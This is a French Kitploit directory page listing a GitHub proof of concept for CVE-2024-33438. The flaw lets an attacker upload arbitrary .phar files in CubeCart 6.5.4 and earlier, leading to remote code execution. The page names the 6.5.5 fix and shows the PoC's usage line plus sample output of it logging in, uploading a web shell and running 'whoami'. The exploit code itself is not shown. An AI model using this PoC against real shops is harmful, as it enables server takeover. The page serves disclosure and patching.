Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 est vulnérable à un téléchargement arbitraire de fichiers qui conduit à une exécution de code à distance (RCE). | Kitploit
Outils/GitHubGitHub/julio-cfa/cve-2024-33438
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 est vulnérable à un téléchargement arbitraire de fichiers qui conduit à une exécution de code à distance (RCE).

Voir le dépôt
337il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Téléchargement arbitraire de fichier conduit à une RCE (CVE-2024-33438)

CubeCart <= 6.5.4 est vulnérable à un problème de téléchargement arbitraire de fichier qui conduit à une exécution de code à distance (RCE). La vulnérabilité affecte le gestionnaire de fichiers de l'application et ses filtres en permettant aux attaquants de télécharger des fichiers .phar contenant du code malveillant. CubeCart doit être mis à jour vers la version 6.5.5 qui implémente un correctif de sécurité pour corriger cette vulnérabilité.

Pour plus de détails, veuillez consulter l'annonce officielle de CubeCart dans les références.

Exploitation

Un proof-of-concept (PoC) automatisé a été créé, mais cette vulnérabilité peut également être exploitée manuellement en téléchargeant un fichier .phar malveillant via le gestionnaire de fichiers.

Voici l'utilisation du PoC :

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

Après exécution, voici le résultat attendu pour une exploitation réussie :

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

Références

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
Télécharger l’outil